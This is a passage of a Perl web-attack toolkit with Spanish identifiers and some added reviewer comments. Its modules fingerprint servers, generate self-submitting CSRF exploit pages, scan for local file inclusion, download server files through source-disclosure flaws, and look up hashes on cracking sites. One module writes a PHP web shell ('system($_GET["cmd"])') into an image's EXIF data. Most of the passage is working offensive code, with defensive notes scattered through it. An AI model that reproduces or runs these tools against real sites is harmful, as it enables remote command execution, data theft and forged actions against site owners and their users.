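            printear( "\n[+] Scan Finished\n", "text", "13", "5" );
        }
        else {
            printear( "\n[-] Invalid port range\n", "text", "5", "5" );
        }
    }

    adios();

}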
2471 | ||
## Prints the banner of the HTTP fingerprint module through printear(),
## using the arguments "logos", "7", "5".
sub head_httpfinger {

    # One element per output row; the empty strings reproduce the blank
    # lines that surround the logo.
    my @filas = (
        '', '',
        '@ @ @@@@@ @@@@@ @@@@@ @@@@@ @ @ @ @@@@ @@@@@ @@@@@',
        '@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @@ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @ @ @ @ @ @',
        '@@@@@@ @ @ @@@@@ @@@@ @ @ @ @ @ @@@ @@@@ @@@@@',
        '@ @ @ @ @ @ @ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @@ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @@ @ @@ @ @ @',
        '@ @ @ @ @ @ @ @ @ @@@ @ @@@@@ @ @',
        '', '',
    );

    return printear( join( "\n", @filas ), "logos", "7", "5" );

}
2488 | ||
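## Prints response headers of a page fetched with the shared $nave object
## (its get() result is used like an HTTP response: header(), headers()).
##
## Option 1 prints Date, Server, Connection and Content-Type.
## Option 2 prints the whole header block.
## Any other option goes straight to adios().
##
## Changes against the original:
##  - option 3 (Exit) had an empty branch and returned without calling
##    adios(), unlike the Exit option of every other menu in this file;
##  - a header that the server did not send is printed as an empty value
##    instead of concatenating undef.
##
## Defender's note: the Server header is what this option reads to name
## the software behind a site; configuring the server to omit product and
## version from that header removes the information at the source.
sub httpfinger {

    clean();
    head_httpfinger();

    my $menu = join "\n",
      '', '[++] Options', '',
      '[+] 1 : Simple Scan',
      '[+] 2 : Full Scan',
      '[+] 3 : Exit',
      '', '';
    printear( $menu, "text", "13", "5" );

    my $op = printear( "[+] Option : ", "stdin", "11", "13" );

    if ( $op eq "1" ) {

        my $page = printear( "\n[+] Page : ", "stdin", "11", "13" );

        printear( "\n[+] Getting Data ...\n", "text", "13", "5" );

        my $code = $nave->get($page);

        # Label shown to the user => header name asked from the response.
        my @campos = (
            [ "Date",         "date" ],
            [ "Server",       "server" ],
            [ "Connection",   "connection" ],
            [ "Content-Type", "content-type" ],
        );

        for my $campo (@campos) {
            my ( $etiqueta, $nombre ) = @$campo;

            # Scalar context: repeated headers come back as one string.
            my $valor = $code->header($nombre);
            $valor = "" unless defined $valor;

            printear( "\n[+] " . $etiqueta . " : " . $valor,
                "text", "13", "5" );
        }

        printear( "\n\n[+] Finished\n", "text", "13", "5" );

    }
    elsif ( $op eq "2" ) {

        my $page = printear( "\n[+] Page : ", "stdin", "11", "13" );

        printear( "\n[+] Getting Data ...\n", "text", "13", "5" );

        my $code = $nave->get($page);

        printear( "\n" . $code->headers()->as_string(), "text", "13", "5" );

        printear( "\n[+] Finished\n", "text", "13", "5" );

    }

    adios();

}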
2548 | ||
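## Lists the forms of a local HTML file and writes a copy of one of them,
## with typed values as hidden inputs, to csrf/<SaveFile> via savefile().
## The written page ends with a script and an iframe whose onmouseover
## handler submits the form.
##
## Changes against the original (file and input handling only):
##  - the HTML file is opened with three-argument open on a lexical
##    handle and the result is checked; the two-argument form lets the
##    typed name choose the open mode;
##  - the function stops after "File Not Found" instead of continuing
##    with an empty document when adios() returns;
##  - attr(name) used a bareword; it is now the string "name";
##  - the typed form number is checked against the number of forms found
##    before it is used as an index.
##
## NOTE(review): the SaveFile name is joined to "csrf/" unchanged, and
## field names and values are written into the HTML without quoting or
## escaping. $count, @inputs and @input are package variables in the
## original and are left so.
##
## Defender's note: a page of this kind only works against an action that
## accepts the request on the strength of the browser's cookies alone;
## per-request anti-CSRF tokens and SameSite cookies make it fail.
sub csrf_scan {

    clean();
    head_csrf();

    my $archivo_html = printear( "[+] File HTML : ",  "stdin", "11", "13" );
    my $resultado    = printear( "\n[+] SaveFile : ", "stdin", "11", "13" );

    unless ( -f $archivo_html ) {
        printear( "\n[-] File Not Found\n", "text", "5", "5" );
        return adios();
    }

    printear( "\n[+] File to parse : " . $archivo_html . "\n",
        "text", "13", "5" );

    my $entrada;
    unless ( open( $entrada, '<', $archivo_html ) ) {
        printear( "\n[-] File Not Found\n", "text", "5", "5" );
        return adios();
    }
    my $words = join q(), <$entrada>;
    close($entrada);

    my @testar = HTML::Form->parse( $words, "/" );

    $count = 0;
    foreach my $test (@testar) {
        $count++;
        printear( "\n -- == Form $count == --\n\n", "text", "13", "5" );

        my $nombre_form = $test->attr("name");
        if ( !defined $nombre_form or $nombre_form eq "" ) {
            printear( "[+] Name : No Found" . "\n", "text", "13", "5" );
        }
        else {
            printear( "[+] Name : " . $nombre_form . "\n",
                "text", "13", "5" );
        }
        printear( "[+] Action : " . $test->action . "\n", "text", "13", "5" );
        printear( "[+] Method : " . $test->method . "\n", "text", "13", "5" );
        printear( "\n-- == Input == --\n\n", "text", "13", "5" );
        @inputs = $test->inputs;
        printear( "Type\t\tName\t\tValue\n", "text", "13", "5" );
        foreach my $campo (@inputs) {
            printear( $campo->type . "\t\t",    "text", "13", "5" );
            printear( $campo->name . "\t\t",    "text", "13", "5" );
            printear( $campo->value . "\t\t\n", "text", "13", "5" );
        }
    }

    my $op = printear( "\n\n[+] Form to generate : ", "stdin", "11", "13" );

    if ( defined $op and $op ne "" ) {

        # Forms are numbered from 1 in the listing above.
        if ( $op !~ /\A[0-9]+\z/ or $op < 1 or $op > scalar @testar ) {
            printear( "\n[-] Invalid form number\n", "text", "5", "5" );
            return adios();
        }

        $op--;
        my $probar = $testar[$op];

        my $action = ver( $words, $op );

        # NOTE(review): $fin is never used below.
        my $fin = nombre($action) . ".html";

        savefile(
            "csrf/" . $resultado,
            "<form action=$action method=" . $probar->method . " name=exploit>"
        );
        @input = $probar->inputs;
        foreach my $campo (@input) {

            my $val = printear(
                "\n[+] Value of the " . $campo->name . " : ", "stdin",
                "11", "13"
            );

            savefile(
                "csrf/" . $resultado,
                "<input type=hidden name="
                  . $campo->name
                  . " value="
                  . $val . ">"
            );
        }
        my $final =
"</form><script language=javascript>function colocar(){document.exploit.submit()}\n"
          . "</script><iframe width=6% height=%6 overflow=hidden onmouseover=javascript:colocar()>\n";
        savefile( "csrf/" . $resultado, $final );
        printear( "\n[+] CSRF Exploit Generated\n", "text", "13", "5" );
    }

    adios();

}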
2630 | ||
## Returns the action of one form of an HTML document.
##
##   $_[0]  HTML text handed to HTML::Form->parse (base "/")
##   $_[1]  zero-based index of the form
##
## When the form's action is empty or just "/", the user is asked to type
## one and that answer is returned instead.
sub ver {
    my ( $html, $indice ) = @_;

    my @formularios = HTML::Form->parse( $html, "/" );
    my $destino     = $formularios[$indice]->action;

    # A usable action is returned untouched.
    return $destino unless $destino eq "" or $destino eq "/";

    my $manual = printear( "\n[+] Action : ", "stdin", "11", "13" );
    return $manual;
}
2644 | ||
## Prints the banner of the CSRF module through printear(),
## using the arguments "logos", "7", "5".
sub head_csrf {

    # One element per output row; the empty strings reproduce the blank
    # lines that surround the logo.
    my @filas = (
        '', '',
        '@@@@ @@@ @@@@@ @@@@@ @@@@@ @@@@ @@@@ @',
        '@ @ @ @ @ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @ @',
        '@ @@@ @@@@@ @@@@ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @ @ @ @',
        '@@@@ @@@ @ @ @ @ @@@@ @@@@ @@@@@',
        '', '', '', '',
    );

    return printear( join( "\n", @filas ), "logos", "7", "5" );
}
2662 | ||
## Menu of the LFI module.
##
## Option 1 requests the typed page with a single quote appended and looks
##          for the PHP "No such file or directory" error text (English or
##          Spanish). On a match it prints the path shown in the error,
##          then requests the page once per entry of @files and records
##          every URL whose answer lacks that error text in lfi_logs.txt.
## Option 2 writes a PHP snippet into the EXIF "Model" tag of the typed
##          image file with Image::ExifTool.
## Any other option goes straight to adios().
##
## $code, $code1 and $ok are package variables, as in the original; $ok is
## never reset here. The regex flags are kept exactly, including /g.
## NOTE(review): inside the loop the second pattern is applied to $code,
## not to $code1.
##
## Defender's notes:
##  - the error text this looks for only reaches the client when PHP
##    prints errors into the page; with display_errors off and include
##    arguments chosen from a fixed list the check finds nothing;
##  - image metadata is free text, so an uploaded picture can carry code.
##    Re-encoding uploads or stripping their metadata, and never passing
##    an uploaded file to include/require, removes the risk option 2
##    relies on.
sub lfi_scan {

    clean();
    head_lfi();

    my $menu = join "\n",
      '', '[++] Options', '',
      '[+] 1 : Scan Page',
      '[+] 2 : Generate Image Infected',
      '[+] 3 : Exit',
      '', '';
    printear( $menu, "text", "13", "5" );

    my $op = printear( "[+] Option : ", "stdin", "11", "13" );

    if ( $op eq "1" ) {

        my $page = printear( "\n[+] Page : ", "stdin", "11", "13" );

        printear( "\n[+] Scanning ...\n", "text", "13", "5" );

        $code = toma( $page . "'" );

        if ( $code =~ /No such file or directory in <b>(.*)<\/b> on line/ig
            or $code =~
            /No existe el fichero o el directorio in <b>(.*?)<\/b> on line/ig )
        {
            printear( "[+] Vulnerable !\n", "text", "13", "5" );
            printear( "[*] Full path discloure detected : $1\n",
                "text", "13", "5" );
            printear( "\n[+] Status : [fuzzing files]\n\n", "text", "13", "5" );

            for my $file (@files) {
                $code1 = toma( $page . $file );

                my $con_error = (
                    $code1 =~
                      /No such file or directory in <b>(.*)<\/b> on line/ig
                      or $code =~
/No existe el fichero o el directorio in <b>(.*?)<\/b> on line/ig
                );
                next if $con_error;

                $ok = 1;
                printear( "[File Found] : " . $page . $file . "\n",
                    "text", "7", "5" );
                savefile( "lfi_logs.txt", $page . $file );
            }

            if ( not( $ok == 1 ) ) {
                printear( "\n[-] Dont found any file\n", "text", "5", "5" );
            }
        }
        else {
            printear( "\n[-] Page not vulnerable to LFI\n", "text", "5", "5" );
        }

    }
    elsif ( $op eq "2" ) {

        my $image = printear( "\n[+] Image : ", "stdin", "11", "13" );

        my $poc = Image::ExifTool->new();

        $poc->ExtractInfo($image);
        $poc->SetNewValue( "Model", '<?php system($_GET["cmd"]);exit(1); ?>' );

        # WriteInfo() rewrites the image file in place.
        if ( $poc->WriteInfo($image) ) {
            printear( "\n[+] Enjoy this photo\n", "text", "7", "5" );
        }
        else {
            printear( "\n[-] Error\n", "text", "5", "5" );
        }

    }

    # Every branch of the menu, including "3" and unknown input, ends here.
    adios();

}
2751 | ||
## Prints the banner of the LFI module through printear(),
## using the arguments "logos", "7", "5".
sub head_lfi {

    # One element per output row; the empty strings reproduce the blank
    # lines that surround the logo.
    my @filas = (
        '', '',
        '### ######## ##### ## ## ###',
        '# # # # # # # # # # # #',
        '# # # # # # # # #',
        '# ### # # # # # # #',
        '# # # # # # # # #',
        '# # # # # # # # #',
        '######## ### ### ## ## #####',
        '', '',
    );

    return printear( join( "\n", @filas ), "logos", "7", "5" );
}
2765 | ||
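## Menu of the hash lookup module.
##
## Option 1 asks for one hash, option 2 for a file with one hash per line.
## Each hash accepted by ver_length() is handed to crackit(); a result
## other than the "false01" marker is printed and appended to
## hashes-found.txt as "hash:result". Option 3 calls adios().
##
## Changes against the original:
##  - the wordlist is opened with three-argument open on a lexical handle
##    and a failed open is reported; the two-argument form lets the typed
##    name choose the open mode;
##  - @varios was declared twice with "my" in the same scope;
##  - the loop variable is lexical instead of the package variable $hash.
##
## The menu is re-entered by recursion after options 1 and 2, as before.
##
## Privacy note: crackit() submits every hash to third-party web services
## and the recovered text is stored unencrypted in hashes-found.txt.
sub menu_crackhash {

    head_crackhash();

    my $op = printear( "[+] Option : ", "stdin", "11", "13" );

    if ( $op eq "1" ) {
        my $ha = printear( "\n[+] Hash : ", "stdin", "11", "13" );
        if ( ver_length($ha) ) {
            printear( "\n[+] Cracking Hash...\n", "text", "13", "5" );
            my $re = crackit($ha);
            if ( $re !~ /false01/ ) {
                printear( "\n[+] Cracked : $re\n", "text", "7", "5" );
                savefile( "hashes-found.txt", $ha . ":" . $re );
            }
            else {
                printear( "\n[-] Not Found\n\n", "text", "5", "5" );
            }
        }
        else {
            printear( "\n[-] Hash invalid\n", "text", "5", "5" );
        }
        printear( "\n[+] Press the enter key to return to main menu\n",
            "text", "13", "5" );
        <stdin>;
        menu_crackhash();
    }
    if ( $op eq "2" ) {
        my $fi = printear( "\n[+] Wordlist : ", "stdin", "11", "13" );
        if ( -f $fi ) {
            printear( "\n[+] Opening File\n", "text", "13", "5" );

            my $lista;
            if ( open( $lista, '<', $fi ) ) {
                my @leidos = <$lista>;
                close $lista;

                # repes() is defined elsewhere; presumably it removes
                # repeated entries -- TODO confirm.
                my @varios = repes(@leidos);

                printear( "\n[+] Hashes Found : " . int(@varios),
                    "text", "13", "5" );
                printear( "\n\n[+] Cracking hashes...\n\n",
                    "text", "13", "5" );

                for my $hash (@varios) {
                    chomp $hash;
                    next unless ver_length($hash);

                    my $re = crackit($hash);
                    if ( $re !~ /false01/ ) {
                        printear( "[+] $hash : $re\n", "text", "7", "5" );
                        savefile( "hashes-found.txt", $hash . ":" . $re );
                    }
                }
            }
            else {
                printear( "\n[-] Cannot open file : $!\n", "text", "5", "5" );
            }
        }
        else {
            printear( "\n[-] File Not Found\n", "text", "5", "5" );
        }
        printear( "\n[+] Press the enter key to return to main menu\n",
            "text", "13", "5" );
        <stdin>;
        menu_crackhash();
    }
    if ( $op eq "3" ) {
        adios();
    }
}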
2827 | ||
## Looks a hash up on four public web services, in a fixed order, and
## returns the first plaintext found, or the marker string "false01" when
## none of them answers with one.
##
## Each lookup posts the hash through tomar() and picks the answer out of
## the returned HTML with a regular expression. The next service is only
## contacted when the previous one gave no match.
##
## Notes:
##  - all four URLs are plain http://, so the hash and the answer travel
##    unencrypted and every contacted service sees the hash;
##  - the returned text is whatever the remote page contained; callers
##    print it and write it to a file, so treat it as untrusted.
##
## Defender's note: lookups of this kind only succeed for unsalted fast
## digests of common passwords; a per-user salt with a slow password
## hashing function takes stored passwords out of their reach.
sub crackit {

    my $md5 = shift;

    ## www.md5.net
    my $primera = tomar(
        "http://www.md5.net/cracker.php",
        { 'hash' => $md5, 'submit' => 'Crack' }
    );
    if ( $primera =~
        m{<input type="text" id="hash" size="(.*?)" value="(.*?)"/>}
        and $primera !~ /Entry not found./mig )
    {
        return $2;
    }

    ## md5online.net
    my $segunda = tomar( "http://md5online.net/index.php",
        { 'pass' => $md5, 'option' => 'hash2text', 'send' => 'Submit' } );
    if ( $segunda =~
        /<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>/ )
    {
        return $2;
    }

    ## md5decryption.com
    my $tercera = tomar(
        "http://md5decryption.com/index.php",
        { 'hash' => $md5, 'submit' => 'Decrypt It!' }
    );
    if ( $tercera =~ /Decrypted Text: <\/b>(.*?)<\/font>/ ) {
        return $1;
    }

    ## md5.my-addr.com
    my $cuarta = tomar(
"http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php",
        { 'md5' => $md5 }
    );
    if ( $cuarta =~
        /<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/ )
    {
        return $1;
    }

    # No service had the hash.
    return "false01";
}
2894 | ||
2895 | sub head_crackhash { | |
2896 | clean(); | |
2897 | printear( " | |
2898 | ||
2899 | ||
2900 | ########## ######### ######### ##### # ### ### | |
2901 | # # # ## # # # # # # # # # # # # # # | |
2902 | # # ## # # # # # # # # # # # # | |
2903 | ### # # # # # # ### ### ### # # ## ## | |
2904 | # # # # # # # # # # # ##### # # | |
2905 | # # # ## # # # # # # # # # # # # # | |
2906 | ### ###### # ##### ######## # ### ### ###### ### | |
2907 | ||
2908 | ||
2909 | ||
2910 | ", "logos", "7", "5" ); | |
2911 | printear( " | |
2912 | [++] Options | |
2913 | ||
2914 | [+] 1 : Hash | |
2915 | [+] 2 : File with hashes | |
2916 | [+] 3 : Exit | |
2917 | ||
2918 | ", "text", "13", "5" ); | |
2919 | } ## | |
2920 | ||
2921 | sub load_locateip { | |
2922 | ||
2923 | head_locateip(); | |
2924 | my $page = printear( "[+] Page : ", "stdin", "11", "13" ); | |
2925 | if ( $page eq "exit" ) { | |
2926 | estoydentroporahora(); | |
2927 | } | |
2928 | infocon($page); | |
2929 | adios(); | |
2930 | ||
2931 | sub head_locateip { | |
2932 | clean(); | |
2933 | printear( " | |
2934 | ||
2935 | ||
2936 | ||
2937 | @ @@@@ @@@@ @ @@@@@ @@@@@ @ @@@@@ | |
2938 | @ @ @ @ @ @ @ @ @ @ @ | |
2939 | @ @ @ @ @ @ @ @ @ @ @ | |
2940 | @ @ @ @ @ @ @ @ @ @ @ | |
2941 | @ @ @ @ @ @ @ @@@@ @ @@@@@ | |
2942 | @ @ @ @ @ @ @ @ @ @ | |
2943 | @ @ @ @ @@@@@ @ @ @ @ | |
2944 | @ @ @ @ @@ @ @ @ @ @ | |
2945 | @@@@@ @@@@ @@@@ @ @ @ @@@@@ @ @ | |
2946 | ||
2947 | ||
2948 | ||
2949 | ", "logos", "7", "5" ); | |
2950 | } | |
2951 | ||
2952 | sub infocon { | |
2953 | my $target = shift; | |
2954 | ||
2955 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split($target); | |
2956 | ||
2957 | if ( $auth ne "" ) { | |
2958 | ||
2959 | my $get = gethostbyname($auth); | |
2960 | my $target = inet_ntoa($get); | |
2961 | ||
2962 | printear( "\n[+] Getting info\n\n", "text", "13", "5" ); | |
2963 | ||
2964 | $total = | |
2965 | "http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$target"; | |
2966 | $re = toma($total); | |
2967 | ||
2968 | if ( $re =~ /City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) { | |
2969 | printear( "[+] City : $2\n", "text", "7", "5" ); | |
2970 | } | |
2971 | else { | |
2972 | printear( "[-] Not Found\n", "text", "5", "5" ); | |
2973 | adios(); | |
2974 | } | |
2975 | if ( $re =~ /Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) { | |
2976 | printear( "[+] Country : $2\n", "text", "7", "5" ); | |
2977 | } | |
2978 | if ( $re =~ | |
2979 | /State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) | |
2980 | { | |
2981 | printear( "[+] State or Region : $2\n", "text", "7", "5" ); | |
2982 | } | |
2983 | ||
2984 | printear( "\n[+] Getting Hosts\n\n", "text", "13", "5" ); | |
2985 | ||
2986 | my $code = toma( "http://www.ip-adress.com/reverse_ip/" . $target ); | |
2987 | ||
2988 | while ( $code =~ /whois\/(.*?)\">Whois/g ) { | |
2989 | my $dns = $1; | |
2990 | chomp $dns; | |
2991 | printear( "[DNS] : $dns\n", "text", "7", "5" ); | |
2992 | } | |
2993 | } | |
2994 | } | |
2995 | ||
2996 | } ## | |
2997 | ||
2998 | ## | |
2999 | ||
3000 | sub load_findpaths { | |
3001 | ||
3002 | head_paths(); | |
3003 | my $web = printear( "[+] Web : ", "stdin", "11", "13" ); | |
3004 | ||
3005 | if ( $web eq "exit" ) { | |
3006 | estoydentroporahora(); | |
3007 | } | |
3008 | ||
3009 | printear( "\n[+] Scan Type\n", "text", "5", "5" ); | |
3010 | printear( "\n[+] 1 : Fast\n", "text", "13", "5" ); | |
3011 | printear( "[+] 2 : Full\n", "text", "13", "5" ); | |
3012 | printear( "[+] 3 : Exit\n", "text", "13", "5" ); | |
3013 | my $op = printear( "\n[+] Option : ", "stdin", "11", "13" ); | |
3014 | ||
3015 | if ( $op eq "3" ) { | |
3016 | estoydentroporahora(); | |
3017 | } | |
3018 | ||
3019 | printear( "\n[+] Scanning ....\n\n", "text", "13", "5" ); | |
3020 | ||
3021 | if ( $op eq "1" ) { | |
3022 | simple($web); | |
3023 | } | |
3024 | elsif ( $op eq "2" ) { | |
3025 | escalar($web); | |
3026 | } | |
3027 | else { | |
3028 | simplex($web); | |
3029 | } | |
3030 | adios(); | |
3031 | ||
3032 | sub escalar { | |
3033 | ||
3034 | my $co = $_[0]; | |
3035 | my $code = toma( $_[0] ); | |
3036 | my @links = get_links($code); | |
3037 | ||
3038 | if ( $code =~ /Index of (.*)/ig ) { | |
3039 | printear( "[+] Link : $co\n", "text", "7", "5" ); | |
3040 | savefile( "paths-logs.txt", $co ); | |
3041 | my $dir_found = $1; | |
3042 | chomp $dir_found; | |
3043 | while ( $code =~ /<a href=\"(.*)\">(.*)<\/a>/ig ) { | |
3044 | my $ruta = $1; | |
3045 | my $nombre = $2; | |
3046 | unless ( $nombre =~ /Parent Directory/ig | |
3047 | or $nombre =~ /Description/ig ) | |
3048 | { | |
3049 | push( @encontrados, $_[0] . "/" . $nombre ); | |
3050 | } | |
3051 | } | |
3052 | } | |
3053 | ||
3054 | for my $com (@links) { | |
3055 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] ); | |
3056 | if ( $path =~ /\/(.*)$/ ) { | |
3057 | my $path1 = $1; | |
3058 | $_[0] =~ s/$path1//ig; | |
3059 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com); | |
3060 | if ( $path =~ /(.*)\// ) { | |
3061 | my $parche = $1; | |
3062 | unless ( $repetidos =~ /$parche/ ) { | |
3063 | $repetidos .= " " . $parche; | |
3064 | my $yeah = "http://" . $auth . $parche; | |
3065 | escalar($yeah); | |
3066 | } | |
3067 | } | |
3068 | for (@encontrados) { | |
3069 | escalar($_); | |
3070 | } | |
3071 | } | |
3072 | } | |
3073 | } | |
3074 | ||
3075 | sub simplex { | |
3076 | ||
3077 | my $code = toma( $_[0] ); | |
3078 | my @links = get_links($code); | |
3079 | ||
3080 | for my $com (@links) { | |
3081 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] ); | |
3082 | if ( $path =~ /\/(.*)$/ ) { | |
3083 | my $path1 = $1; | |
3084 | $_[0] =~ s/$path1//ig; | |
3085 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com); | |
3086 | if ( $path =~ /(.*)\// ) { | |
3087 | my $parche = $1; | |
3088 | unless ( $repetidos =~ /$parche/ ) { | |
3089 | $repetidos .= " " . $parche; | |
3090 | my $code = toma( "http://" . $auth . $parche ); | |
3091 | ||
3092 | if ( $code =~ /Index of (.*)</ig ) { | |
3093 | my $dir_found = $1; | |
3094 | chomp $dir_found; | |
3095 | my $yeah = "http://" . $auth . $parche; | |
3096 | printear( "[+] Link : $yeah\n", "text", "7", "5" ); | |
3097 | savefile( "paths-logs.txt", $yeah ); | |
3098 | } | |
3099 | } | |
3100 | } | |
3101 | } | |
3102 | } | |
3103 | } | |
3104 | ||
3105 | sub head_paths { | |
3106 | clean(); | |
3107 | printear( " | |
3108 | ||
3109 | ||
3110 | @@@@@ @ @ @@@@@ @ | |
3111 | @ @ @ @ @ @ | |
3112 | @ @ @ @ @ @ | |
3113 | @ @ @ @@ @@@@ @@@ @@ @ @ @@@ @@ @ @@ @@ | |
3114 | @@@@ @ @@ @ @ @ @ @ @ @@@@@ @ @ @@ @ @ @ | |
3115 | @ @ @ @ @ @ @@@@@ @ @ @@@@ @ @ @ @ | |
3116 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3117 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3118 | @ @ @ @ @@@@ @@@ @ @ @@@@ @ @ @ @@ | |
3119 | ||
3120 | ||
3121 | ||
3122 | ||
3123 | ||
3124 | ", "logos", "7", "5" ); | |
3125 | } | |
3126 | ||
3127 | } ## | |
3128 | ||
3129 | sub load_fsd { | |
3130 | ||
3131 | head_fsd(); | |
3132 | ||
3133 | my $page = printear( "[+] Page : ", "stdin", "11", "13" ); | |
3134 | ||
3135 | if ( $page eq "exit" ) { | |
3136 | estoydentroporahora(); | |
3137 | } | |
3138 | ||
3139 | ver_now_now($page); | |
3140 | ||
3141 | adios(); | |
3142 | ||
3143 | sub ver_now_now { | |
3144 | ||
3145 | my $page = $_[0]; | |
3146 | my $archivo; | |
3147 | ||
3148 | if ( $page =~ /(.*)\/(.*)\?/ ) { | |
3149 | $archivo = $2; | |
3150 | } | |
3151 | ||
3152 | printear( "\n[+] Scanning page ...\n", "text", "13", "5" ); | |
3153 | ||
3154 | my $code = toma( $page . $archivo ); | |
3155 | ||
3156 | if ( $code =~ /header\((.*)Content-Disposition: attachment;/ig ) { | |
3157 | ||
3158 | printear( "\n[+] Vulnerable !\n", "text", "13", "5" ); | |
3159 | ||
3160 | my $code = toma( $page . "'" ); | |
3161 | ||
3162 | if ( $code =~ /No such file or directory in <b>(.*)<\/b> on line/ ) | |
3163 | { | |
3164 | ||
3165 | printear( | |
3166 | "\n[+] Full Source Discloure Detect : $1\a\n", "text", | |
3167 | "7", "5" | |
3168 | ); | |
3169 | ||
3170 | } | |
3171 | elsif ( $code =~ | |
3172 | /No existe el fichero o el directorio in <b>(.*)<\/b> on line/ ) | |
3173 | { | |
3174 | printear( | |
3175 | "\n[+] Full Source Discloure Detect : $1\a\n", "text", | |
3176 | "7", "5" | |
3177 | ); | |
3178 | } | |
3179 | else { | |
3180 | printear( | |
3181 | "\n[+] Full Path Dislocure : Not Found\n", "text", | |
3182 | "7", "5" | |
3183 | ); | |
3184 | } | |
3185 | ||
3186 | while (1) { | |
3187 | ||
3188 | my $url = printear( "\n[+] URL : ", "stdin", "11", "13" ); | |
3189 | ||
3190 | if ( $url eq "exit" ) { | |
3191 | adios(); | |
3192 | } | |
3193 | ||
3194 | if ( | |
3195 | download( $page . $url, "logs/fsdlogs/" . basename($url) ) ) | |
3196 | { | |
3197 | printear( "\n[+] File Downloaded\n", "text", "13", "5" ); | |
3198 | ||
3199 | system_leida( "logs/fsdlogs/" . basename($url) ); | |
3200 | ||
3201 | } | |
3202 | ||
3203 | } | |
3204 | ||
3205 | } | |
3206 | else { | |
3207 | printear( "\n[-] Web not vulnerable\n\n", "text", "5", "5" ); | |
3208 | } | |
3209 | ||
3210 | } | |
3211 | ||
3212 | sub head_fsd { | |
3213 | clean(); | |
3214 | printear( " | |
3215 | ||
3216 | ||
3217 | @@@@@ @@@ @@@@ @@@@@ @ @ @@@@@ @ @@@@ @ @@@@@ | |
3218 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3219 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3220 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3221 | @@@@ @@@ @ @ @@@@ @ @@@@@ @ @ @ @ @ | |
3222 | @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3223 | @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3224 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3225 | @ @@@ @@@@ @@@@@ @ @ @ @@@@@ @@@@ @ @ | |
3226 | ||
3227 | ||
3228 | ||
3229 | ||
3230 | ", "logos", "7", "5" ); | |
3231 | } | |
3232 | ||
3233 | sub download { | |
3234 | if ( $nave->mirror( $_[0], $_[1] ) ) { | |
3235 | if ( -f $_[1] ) { | |
3236 | return true; | |
3237 | } | |
3238 | } | |
3239 | } | |
3240 | ||
3241 | sub installer_fsd { | |
3242 | unless ( -d "fsdlogs/" ) { | |
3243 | mkdir( "fsdlogs/", "777" ); | |
3244 | chmod "fsdlogs/", "0777"; | |
3245 | } | |
3246 | } | |
3247 | ||
3248 | } ## | |
3249 | ||
3250 | sub load_bypass { | |
3251 | ||
3252 | head_bypass(); | |
3253 | start_com(); | |
3254 | adios(); | |
3255 | ||
3256 | sub start_com { | |
3257 | my $url = printear( "\n\n[+] Admin : ", "stdin", "11", "13" ); | |
3258 | ||
3259 | if ( $url eq "exit" ) { | |
3260 | estoydentroporahora(); | |
3261 | } | |
3262 | ||
3263 | print "\n[+] Scanning page ...\n"; | |
3264 | ||
3265 | my $code = toma($url); | |
3266 | ||
3267 | my @testar = HTML::Form->parse( $code, "/" ); | |
3268 | ||
3269 | $count = 0; | |
3270 | foreach my $test (@testar) { | |
3271 | $count++; | |
3272 | printear( "\n -- == Form $count == --\n\n", "text", "5", "5" ); | |
3273 | if ( $test->attr(name) eq "" ) { | |
3274 | printear( "[+] Name : No Found" . "\n", "text", "13", "5" ); | |
3275 | } | |
3276 | else { | |
3277 | printear( | |
3278 | "[+] Name : " . $test->attr(name) . "\n", "text", | |
3279 | "13", "5" | |
3280 | ); | |
3281 | } | |
3282 | printear( "[+] Action : " . $test->action . "\n", | |
3283 | "text", "13", "5" ); | |
3284 | printear( "[+] Method : " . $test->method . "\n", | |
3285 | "text", "13", "5" ); | |
3286 | printear( "\n-- == Input == --\n", "text", "5", "5" ); | |
3287 | @inputs = $test->inputs; | |
3288 | ||
3289 | foreach $in (@inputs) { | |
3290 | printear( "\n[+] Type : " . $in->type . "\n", | |
3291 | "text", "13", "5" ); | |
3292 | printear( "[+] Name : " . $in->name . "\n", "text", "13", "5" ); | |
3293 | printear( "[+] Value : " . $in->value . "\n", | |
3294 | "text", "13", "5" ); | |
3295 | } | |
3296 | } | |
3297 | ||
3298 | my $op = printear( "\n[+] Form to crack : ", "stdin", "11", "13" ); | |
3299 | my $aca = printear( "\n[+] Submit Name : ", "stdin", "11", "13" ); | |
3300 | ||
3301 | printear( "\n[+] Options to check\n\n", "text", "5", "5" ); | |
3302 | printear( "[?] 1 - Positive\n", "text", "13", "5" ); | |
3303 | printear( "[?] 2 - Negative\n", "text", "13", "5" ); | |
3304 | printear( "[?] 3 - Automatic\n\n", "text", "13", "5" ); | |
3305 | my $op2 = printear( "[+] Option : ", "stdin", "11", "13" ); | |
3306 | ||
3307 | if ( $op2 eq "1" ) { | |
3308 | my $st = printear( "\n[+] String : ", "stdin", "11", "13" ); | |
